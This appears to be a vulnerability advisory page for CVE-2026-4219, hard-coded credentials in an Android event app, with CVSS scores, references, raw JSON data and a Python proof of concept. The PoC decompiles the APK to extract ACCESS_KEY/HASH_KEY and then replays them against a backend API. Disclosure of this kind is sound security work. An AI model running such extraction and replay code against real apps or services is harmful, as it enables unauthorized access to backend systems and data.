Security Vulnerability Report
CVE-2026-4219 CVSS 3.3 LOW

Published: 2026-03-16 14:20:12
Last Modified: 2026-04-22 21:32:08

Description

A flaw has been found in INDEX Conferences & Exhibitions Organization YWF BPOF APGCS App up to 1.0.2 on Android. Affected by this vulnerability is an unknown functionality of the file com/index/event/BuildConfig.java of the component ae.index.apgcs. Executing a manipulation of the argument ACCESS_KEY/HASH_KEY can lead to hard-coded credentials. The attack is restricted to local execution. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

INDEX APGCS App <= 1.0.2 (Android)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
import re
import subprocess

import requests

# CVE-2026-4219 PoC: extract hard-coded credentials from the INDEX APGCS App.
# Requires apktool on PATH. BuildConfig string constants appear in the decoded
# smali as `.field public static final NAME:Ljava/lang/String; = "value"`.
FIELD_RE = re.compile(r'\.field .*\b(ACCESS_KEY|HASH_KEY):Ljava/lang/String; = "([^"]*)"')


def extract_apk_info(apk_path):
    """Decode the APK with apktool and read ACCESS_KEY/HASH_KEY from BuildConfig.smali."""
    output_dir = apk_path.replace('.apk', '_decoded')
    # Decompile APK (-f overwrites a previous output directory)
    result = subprocess.run(['apktool', 'd', apk_path, '-o', output_dir, '-f'],
                            capture_output=True, text=True)
    if result.returncode != 0:
        raise RuntimeError(f'apktool failed: {result.stderr.strip()}')

    credentials = {'ACCESS_KEY': None, 'HASH_KEY': None}
    # Multidex APKs are decoded into smali/, smali_classes2/, ... so check each directory
    for entry in sorted(os.listdir(output_dir)):
        if not entry.startswith('smali'):
            continue
        build_config_path = os.path.join(output_dir, entry, 'com', 'index', 'event', 'BuildConfig.smali')
        if not os.path.exists(build_config_path):
            continue
        with open(build_config_path, 'r', encoding='utf-8') as f:
            for line in f:
                match = FIELD_RE.search(line)
                if match:
                    name, value = match.groups()
                    credentials[name] = value
                    print(f'[+] Found: {line.strip()}')
    return credentials


def test_exposed_backend(access_key, hash_key, target_url):
    """Test if extracted credentials can access backend APIs"""
    # Header names are the PoC author's assumption about how the backend expects the keys
    headers = {
        'X-ACCESS-KEY': access_key,
        'X-HASH-KEY': hash_key
    }
    response = requests.get(target_url, headers=headers, timeout=10)
    print(f'[+] Status: {response.status_code}')
    print(f'[+] Response: {response.text[:500]}')
    return response


if __name__ == '__main__':
    # Usage example
    # apk_path = 'ae.index.apgcs.apk'
    # creds = extract_apk_info(apk_path)
    # if creds['ACCESS_KEY'] and creds['HASH_KEY']:
    #     test_exposed_backend(creds['ACCESS_KEY'], creds['HASH_KEY'], 'https://api.target.com/v1/sensitive-endpoint')
```

References

Weaknesses: CWE-259, CWE-798

- https://vuldb.com/?ctiid.351143
- https://vuldb.com/?id.351143
- https://vuldb.com/?submit.770513
- https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251?source=copy_link
- https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4219",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T14:20:12.377",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw has been found in INDEX Conferences & Exhibitions Organization YWF BPOF APGCS App up to 1.0.2 on Android. Affected by this vulnerability is an unknown functionality of the file com/index/event/BuildConfig.java of the component ae.index.apgcs. Executing a manipulation of the argument ACCESS_KEY/HASH_KEY can lead to hard-coded credentials. The attack is restricted to local execution. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."
      },
      {
        "lang": "es",
        "value": "Se ha encontrado una falla en la aplicación INDEX Conferences &amp; Exhibitions Organization YWF BPOF APGCS hasta la versión 1.0.2 en Android. Afectada por esta vulnerabilidad es una funcionalidad desconocida del archivo com/index/event/BuildConfig.java del componente ae.index.apgcs. La ejecución de una manipulación del argumento ACCESS_KEY/HASH_KEY puede llevar a credenciales codificadas de forma rígida. El ataque está restringido a la ejecución local. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 1.9,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "PROOF_OF_CONCEPT",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 1.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:N",
            "baseScore": 1.7,
            "accessVector": "LOCAL",
            "accessComplexity": "LOW",
            "authentication": "SINGLE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "baseSeverity": "LOW",
          "exploitabilityScore": 3.1,
          "impactScore": 2.9,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-259"},
          {"lang": "en", "value": "CWE-798"}
        ]
      }
    ],
    "references": [
      {"url": "https://vuldb.com/?ctiid.351143", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.351143", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.770513", "source": "[email protected]"},
      {"url": "https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251?source=copy_link", "source": "[email protected]"},
      {"url": "https://www.notion.so/Authorization-Credentials-in-ae-index-apgcs-Lead-to-Exposure-of-Backend-Secrets-3172de3f97fb8040bc30c5519a742251", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}
```